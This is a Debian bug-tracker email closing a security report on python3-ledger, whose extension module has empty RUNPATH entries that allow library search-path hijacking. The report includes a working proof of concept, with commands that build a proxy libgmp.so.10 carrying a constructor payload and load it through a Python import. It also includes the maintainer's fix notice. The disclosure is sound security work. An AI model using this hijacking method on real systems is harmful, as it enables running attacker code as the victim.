Your message dated Thu, 04 Jun 2026 23:34:22 +0000
with message-id <[email protected]>
and subject line Bug#1138597: fixed in ledger 3.4.0-3
has caused the Debian Bug report #1138597,
regarding python3-ledger: Library search path hijacking via empty RUNPATH
elements
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1138597: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1138597
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: python3-ledger
Version: 3.4.0-1+b1
Severity: important
Tags: security
*Summary:*
The python3-ledger Debian package installs the Python extension module:
/usr/lib/python3/dist-packages/ledger.cpython-313-aarch64-linux-gnu.so
This library contains a RUNPATH consisting entirely of empty path elements:
RUNPATH [:::::::::::::::]
Empty entries in an ELF RUNPATH are interpreted by the dynamic linker as
the current working directory (CWD). As a result, when
ledger.cpython-313-aarch64-linux-gnu.so resolves its dependencies, the
dynamic linker searches the process working directory before falling back
to the system library paths.
This permits library search path hijacking if an attacker can place a
malicious shared library in a directory from which a victim executes
software that imports the ledger module.
*Impact:*
An attacker can cause execution of attacker-controlled code in the security
context of the user running the affected application.
Since python3-ledger provides Python bindings, a victim might execute a
Python script from a directory (such as a downloaded dataset, extracted
archive, shared workspace, or /tmp) that contains an attacker-controlled
shared library. If this occurs, the malicious library will be loaded and
executed before the legitimate system library.
This issue falls under CWE-427 (Uncontrolled Search Path Element).
*Proof of Concept:*
*1. Create an attacker-controlled workspace:*
$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
*2. Create the malicious payload:*
$ cat << 'EOF' > poc_ledger.c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void exploit() {
printf("\n[!!!] LEDGER HIJACK SUCCESSFUL [!!!]\n");
exit(0);
}
EOF
*3. Create a dummy version map to satisfy dependency version requirements:*
$ cat << 'EOF' > versions.map
GLIBC_2.17 { };
GLIBC_2.32 { };
EOF
*4. Build a proxy libgmp.so.10 library using DT_AUXILIARY so normal symbol
resolution continues:*
$ gcc -shared -fPIC poc_ledger.c \
-o libgmp.so.10 \
-Wl,-f,/usr/lib/aarch64-linux-gnu/libgmp.so.10 \
-Wl,--version-script=versions.map
*5. Create a Python script that imports the vulnerable library:*
$ cat << 'EOF' > trigger.py
import ledger
print("ledger imported successfully!")
EOF
*6. Execute the trigger from the malicious directory:*
$ python3 trigger.py
*Result:*
[!!!] LEDGER HIJACK SUCCESSFUL [!!!]
*Expected Fix:*
The package should not ship binaries containing empty path elements in
their RUNPATH. The RUNPATH entry should be removed or replaced with an
explicit trusted library path.
--- End Message ---
--- Begin Message ---
Source: ledger
Source-Version: 3.4.0-3
Done: David Bremner <[email protected]>
We believe that the bug you reported is fixed in the latest version of
ledger, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
David Bremner <[email protected]> (supplier of updated ledger package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Thu, 04 Jun 2026 07:41:00 +0900
Source: ledger
Architecture: source
Version: 3.4.0-3
Distribution: unstable
Urgency: medium
Maintainer: Debian QA Group <[email protected]>
Changed-By: David Bremner <[email protected]>
Closes: 1049313 1138597
Changes:
ledger (3.4.0-3) unstable; urgency=medium
.
* Bug fix: "Library search path hijacking via empty RUNPATH elements",
thanks to Jonathan Trowbridge (Closes: #1138597).
* Orphan package
.
ledger (3.4.0-2) unstable; urgency=medium
.
* Add doc/version.texi to d/clean (Closes: #1049313).
Checksums-Sha1:
a420ceeb96ac15a01621408f98e3fa76d9abe175 1697 ledger_3.4.0-3.dsc
e430556837e19b147a2af269be6694837d45eedb 8608 ledger_3.4.0-3.debian.tar.xz
Checksums-Sha256:
685b6bf3b4f52857666bd849d6b8f7dd6ec6d66200f339f2e3ad9e8c8d6a073e 1697
ledger_3.4.0-3.dsc
b8109c6ba96854951c54a0d52bb088e8aeb8eb29f60844bbe7d660d1fc7855d5 8608
ledger_3.4.0-3.debian.tar.xz
Files:
debb0713ca45491c6643d6475900073f 1697 utils optional ledger_3.4.0-3.dsc
6ab8e3d572efe3c8ab30e8b72a103ee2 8608 utils optional
ledger_3.4.0-3.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iHUEARYKAB0WIQS5beC2erx2PFqyC7XhcL+0NDTnAAUCaiIGuwAKCRDhcL+0NDTn
AMKYAPoCbmbC2LwmJb95Xj3KwdZC5VBRfHOp9rHh+kbBB0cEyQEAiMcPd7hyu27q
xamLpw3CLAUXFHWgQHWueLHReFJuGAs=
=aUNY
-----END PGP SIGNATURE-----
pgpxTbS15YILH.pgp
Description: PGP signature
--- End Message ---
